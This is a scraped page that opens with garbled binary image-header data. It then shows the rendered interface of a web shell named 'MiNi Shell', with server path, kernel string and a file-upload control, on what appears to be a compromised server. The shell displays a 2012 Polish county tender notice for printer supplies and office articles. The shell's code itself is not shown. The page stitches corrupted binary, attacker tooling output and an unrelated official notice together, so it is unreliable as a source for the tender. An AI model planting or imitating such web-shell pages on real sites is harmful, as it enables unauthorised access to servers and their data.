JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120214/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120214/44338-N-2012.html

<p class="kh_header"><b>Zwoleń: Dostawa materiałów eksploatacyjnych do drukarek komputerowych oraz artykułów biurowych dla potrzeb Powiatu Zwoleńskiego, oraz dla potrzeb realizacji projektów Nr POKL.09.02.00-14-008-08 Szkolenia i doradztwo podnoszące zdolności uczniów do zatrudnienia - szansą na lepszą przyszłość, Nr POKL 09.02.00-14-024-08 Pokonujemy bariery czyli jak nie zostać w tyle-  Nr POIG-8.3-2009-MAZ-134 Partnerstwo dla społeczeństwa informacyjnego - przeciwdziałanie wykluczeniu cyfrowemu w gminach Powiatu Zwoleńskiego nr POKL.09.02.00-14-027=11 Stawiam na swoją przyszłość</b><br>
<b>Numer ogłoszenia: 44338 - 2012; data zamieszczenia: 14.02.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiat Zwoleński , ul. Władysława Jagiełły 4, 26-700 Zwoleń, woj. mazowieckie, tel. 48 6763389 w. 16, 6763779w.26, faks 48 6762520.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa materiałów eksploatacyjnych do drukarek komputerowych oraz artykułów biurowych dla potrzeb Powiatu Zwoleńskiego, oraz dla potrzeb realizacji projektów Nr POKL.09.02.00-14-008-08 Szkolenia i doradztwo podnoszące zdolności uczniów do zatrudnienia - szansą na lepszą przyszłość, Nr POKL 09.02.00-14-024-08 Pokonujemy bariery czyli jak nie zostać w tyle-  Nr POIG-8.3-2009-MAZ-134 Partnerstwo dla społeczeństwa informacyjnego - przeciwdziałanie wykluczeniu cyfrowemu w gminach Powiatu Zwoleńskiego nr POKL.09.02.00-14-027=11 Stawiam na swoją przyszłość.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem  zamówienia jest sprzedaż i sukcesywna dostawa materiałów eksploatacyjnych do drukarek komputerowych  oraz artykułów biurowych dla potrzeb Powiatu Zwoleńskiego oraz  jednorazowe dostawy dla potrzeb realizacji projektów Nr POKL.09.02.00-14-008-08 Szkolenia i doradztwo podnoszące zdolności uczniów do zatrudnienia - szansą na lepszą przyszłość, Nr POKL 09.02.00-14-024-08 Pokonujemy bariery czyli jak nie zostać w tyle -  Nr POIG-8.3-2009-MAZ-134 Partnerstwo dla społeczeństwa informacyjnego - przeciwdziałanie wykluczeniu cyfrowemu w gminach Powiatu Zwoleńskiego nr POKL.09.02.00-14-027-11 Stawiam na swoją przyszłość
2. Zakresy dostaw szczegółowo  zostały określone w  opisach przedmiotu zamówienia stanowiących  ZAŁ. Nr 1-6 do SIWZ. Przedmiot zamówienia musi odpowiadać parametrom ilościowym i jakościowym określonym przez Zamawiającego.
3. Przedmiot zamówienia został podzielony na VI części
Część I zamówienia -  Dostawa materiałów eksploatacyjne do drukarek komputerowych dla Powiatu Zwoleńskiego
Część II zamówienia - Dostawa artykułów biurowych dla Powiatu Zwoleńskiego
Część III zamówienia - Dostawa artykułów  biurowych w ramach projektu Stawiam na swoją przyszłość
Część IV zamówienia -  Dostawa artykułów biurowych w ramach projektu Szkolenia i doradztwo podnoszące zdolności uczniów do zatrudnienia - szansą na lepszą przyszłość
Część V zamówienia - Dostawa artykułów biurowych w ramach projektu Pokonujemy bariery czyli jak nie zostać w tyle
Część VI zamówienia - Dostawa artykułów biurowych w ramach projektu Partnerstwo dla społeczeństwa informacyjnego - przeciwdziałanie wykluczeniu cyfrowemu w gminach Powiatu Zwoleńskiego
4.Zamawiający wymaga aby materiały eksploatacyjne do drukarek komputerowych były fabrycznie nowe, nieużywane, wolne od wad fizycznych, wyprodukowane  6 miesięcy przed dostawą do Zamawiającego przez producenta wskazanego w ZAŁ. Nr 2 ,3 i 4 do SIWZ, lub równoważne, na opakowaniu powinna znajdować się data produkcji danego wyrobu.
5.Jeżeli w opisie przedmiotu zamówienia wskazano jakikolwiek znak towarowy, patent czy pochodzenie należy przyjąć, że wskazane patenty, znaki towarowe, pochodzenie określają parametry techniczne, eksploatacyjne, użytkowe, co oznacza, że Zamawiający dopuszcza złożenie oferty w tej części przedmiotu zamówienia o równoważnych lub lepszych parametrach technicznych, eksploatacyjnych i użytkowych. Ciężar udowodnienia, że oferowany przedmiot zamówienia jest równoważny w stosunku do wymagań określonych przez Zamawiającego  w SIWZ spoczywa na Wykonawcy w myśl art. 30 ust. 5 Ustawy Pzp.
6.Zamawiający nie dopuszcza stosowania materiałów eksploatacyjnych równoważnych w niektórych pozycjach wymienionych w Zał. Nr 2 do SIWZ /oryginał/, z uwagi na fakt, iż sprzęt ten jest objęty gwarancją producenta.
7.Zamawiający informuje, iż ilości podane w Zał.  Nr 1 i2 do SIWZ mają charakter orientacyjny, zostały określone na podstawie potrzeb z lat ubiegłych i służą do wyboru oferty najkorzystniejszej . Zamawiający nie jest zobowiązany do zamówienia w ilościach podanych w Załącznikach  Nr 1 i 2do SIWZ, ani do zwrotu Wykonawcy kwoty stanowiącej równowartość niezamówionych ilości materiałów eksploatacyjnych i artykułów biurowych. Faktycznie zamawiane ilości materiałów będą wynikać z bieżących potrzeb Zamawiającego po cenach jednostkowych przedstawionych w ofercie Wykonawca zobowiązuje się do sukcesywnego dostarczania przedmiotu umowy dotyczy dostaw dla Powiatu Zwoleńskiego, z wyłączenie dostaw do realizacji projektów w miarę zgłaszanych zapotrzebowań w terminie nie dłuższym niż 3 dni robocze( rozumianych jako dni od poniedziałku do piątku w godz. od 8:00 do 15:00 z wyłączeniem dni ustawowo wolnych od pracy) od zgłoszenia zapotrzebowania przez Zamawiającego ( pocztą elektroniczną lub telefonicznego potwierdzonego faksem.
8.Ilości podane w Zał. Nr 3- 6 do SIWZ będą zrealizowane   jednorazowo . Zamawiający nie jest zobowiązany do zamówienia w ilościach podanych w Załącznikach  do SIWZ, ani do zwrotu Wykonawcy kwoty stanowiącej równowartość niezamówionych ilości.
9.Wykonawca ma obowiązek w cenie oferty zutylizować zużyte pojemniki po materiałach eksploatacyjnych do drukarek komputerowych. W związku z tym Wykonawca zobowiązany jest odebrać je z siedziby Zamawiającego w terminie uzgodnionym z Zamawiającym.
10.Warunki gwarancji odnośnie materiałów eksploatacyjnych do drukarek komputerowych
Okres gwarancji  na dostarczone materiały eksploatacyjne liczy się od daty ich odbioru bez uwag i zastrzeżeń ze strony Zamawiającego.
W przypadku ujawnienia w okresie gwarancji wad materiałów eksploatacyjnych, Wykonawca zobowiązany będzie do bezpłatnej ich wymiany na nowe wolne od wad, w terminie nie dłuższym niż 3 dni robocze od dnia zgłoszenia przez Zamawiającego drogą telefoniczną, faksem lub pisemnie.
Wykonawca zobowiązany będzie dostarczyć nowe materiały eksploatacyjne wolne od wad, do siedziby Zamawiającego na własny koszt.
W przypadku wymiany materiału eksploatacyjnego na nowe, wolne od wad, okres gwarancji biegnie na nowo, od daty ich odbioru.
10.Miejsce realizacji zamówienia.
 Zamawiane materiały eksploatacyjne do drukarek komputerowych i artykuły biurowe będą dostarczane sukcesywnie do siedziby Zamawiającego, przy ul. Wł. Jagiełły 4 w Zwoleniu.
11. W celu potwierdzenia, że oferowane materiały eksploatacyjne odpowiadają wymaganiom określonym przez Zamawiającego, Wykonawca składający ofertę dostarczy:
a) w przypadku oferowania Materiałów eksploatacyjnych innych producentów niż producent urządzenia drukującego, Wykonawca zobowiązany jest załączyć do oferty zapewnienie, iż zastosowanie proponowanych materiałów eksploatacyjnych nie spowoduje utraty gwarancji na urządzenia, do których przeznaczone są oferowane Materiały eksploatacyjne;
b) oświadczenie producenta produktów równoważnych - oferowanych materiałów eksploatacyjnych, że produkty co najmniej odpowiadają jakością produktom wymienionym w Załącznikach do SIWZ..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 30.19.00.00-7, 30.19.20.00-1, 30.19.21.13-6.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 6.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający w niniejszym postępowaniu nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Działalność prowadzona na potrzeby wykonania przedmiotu zamówienia nie wymaga posiadania specjalnych
uprawnień.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje szczególnych wymagań, warunek zostanie spełniony, jeżeli Wykonawca złoży
oświadczenie na druku stanowiącym Zał. Nr 8 do SIWZ</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje szczególnych wymagań, warunek zostanie spełniony, jeżeli Wykonawca złoży oświadczenie na druku stanowiącym Zał. Nr 8 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje szczególnych wymagań, warunek zostanie spełniony, jeżeli Wykonawca złoży oświadczenie na druku stanowiącym Zał. Nr 8 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje szczególnych wymagań, warunek zostanie spełniony, jeżeli Wykonawca złoży oświadczenie na druku stanowiącym Zał. Nr 8 do SIWZ</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1.Ppełnomocnictwo osób podpisujących ofertę do podejmowania zobowiązań w imieniu firmy składającej ofertę, o ile nie wynikają z przepisów prawa lub innych dokumentów;
2.Wypełniony formularz ofertowy zgodnie z Zał. Nr 7, 7a,7b,7c,7d,  do SIWZ stosownie do części zamówienia
3.Specyfikacja techniczna przedmiotu zamówienia  które Wykonawca zamierza przeznaczyć do realizacji zamówienia stosownie do części zamówienia i Zał. Nr 1-6</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Zamawiający dopuszcza zmianę umowy w stosunku do treści oferty na podstawie której dokonano wyboru Wykonawcy    w formie aneksu  w następujących przypadkach:
a) zmiany stawki podatku od towarów i usług (VAT) - w przypadku ustawowej zmiany podatku od towarów i usług (VAT). Wówczas wynagrodzenie umowne ulegnie modyfikacji proporcjonalnie do tej zmiany.
b) zmiany Materiałów eksploatacyjnych lub artykułów biurowych na inne spełniające wymagania zawarte w SIWZ- w sytuacji wycofania przez producenta urządzeń z produkcji i braku ich dostępności na rynku po terminie zawarcia umowy. W tej sytuacji na Wykonawcy ciąży obowiązek udowodnienia takiej sytuacji.
c) polegającej na zmniejszeniu ilości zamawianych materiałów eksploatacyjnych do drukarek komputerowych i artykułów  biurowych w stosunku do Zał. Nr  1 i 2 do SIWZ 
d).Wprowadzenia innego asortymentu dostawy Materiałów eksploatacyjnych w przypadku zakupu nowych drukarek, nie wymienionych w ZAł. Nr 2 do SIWZ.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.zwolenpowiat.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Starostwo Powiatowe ul. Wł. Jagiełły 4, 26-700 Zwoleń.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 24.02.2012 godzina 09:00, miejsce: Starostwo Powiatowe ul. Wł. Jagiełły 4, 26-700 Zwoleń-sekretariat pok. nr 9- I piętro.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Dostawa materiałów eksploatacyjne do drukarek komputerowych dla Powiatu Zwoleńskiego.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zakres dostawy szczegółowo  został określony w opisie przedmiotu zamówienia stanowiących  ZAŁ. Nr 1 do SIWZ. Przedmiot zamówienia musi odpowiadać parametrom ilościowym i jakościowym określonym przez Zamawiającego..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 30.19.21.13-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Dostawa artykułów biurowych dla Powiatu Zwoleńskiego.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zakres dostawy szczegółowo  został określony w opisie przedmiotu zamówienia stanowiących  ZAŁ. Nr 2 do SIWZ. Przedmiot zamówienia musi odpowiadać parametrom ilościowym i jakościowym określonym przez Zamawiającego..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 30.19.20.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Dostawa artykułów  biurowych w ramach projektu Stawiam na swoją przyszłość.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zakres dostawy szczegółowo  został określony w opisie przedmiotu zamówienia stanowiącym  ZAŁ. Nr 3 do SIWZ. Przedmiot zamówienia musi odpowiadać parametrom ilościowym i jakościowym określonym przez Zamawiającego..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 30.19.00.00-7.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 30.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Dostawa artykułów biurowych w ramach projektu  Szkolenia i doradztwo podnoszące zdolności uczniów do zatrudnienia - szansą na lepszą przyszłość.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zakres dostawy szczegółowo  został określony w opisie przedmiotu zamówienia stanowiący  ZAŁ. Nr 4 do SIWZ. Przedmiot zamówienia musi odpowiadać parametrom ilościowym i jakościowym określonym przez Zamawiającego..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 30.19.00.00-7.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 30.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Dostawa artykułów biurowych w ramach projektu Pokonujemy bariery czyli jak nie zostać w tyle.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zakres dostawy szczegółowo  został określony w opisie przedmiotu zamówienia stanowiący  ZAŁ. Nr 5 do SIWZ. Przedmiot zamówienia musi odpowiadać parametrom ilościowym i jakościowym określonym przez Zamawiającego..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 30.18.00.00-7.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 30.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Dostawa artykułów biurowych w ramach projektu Partnerstwo dla społeczeństwa informacyjnego - przeciwdziałanie wykluczeniu cyfrowemu w gminach Powiatu Zwoleńskiego.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zakres dostaw szczegółowo  został określony w opisie przedmiotu zamówienia stanowiącym  ZAŁ. Nr 6 do SIWZ. Przedmiot zamówienia musi odpowiadać parametrom ilościowym i jakościowym określonym przez Zamawiającego..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 30.19.00.00-7.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 30.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com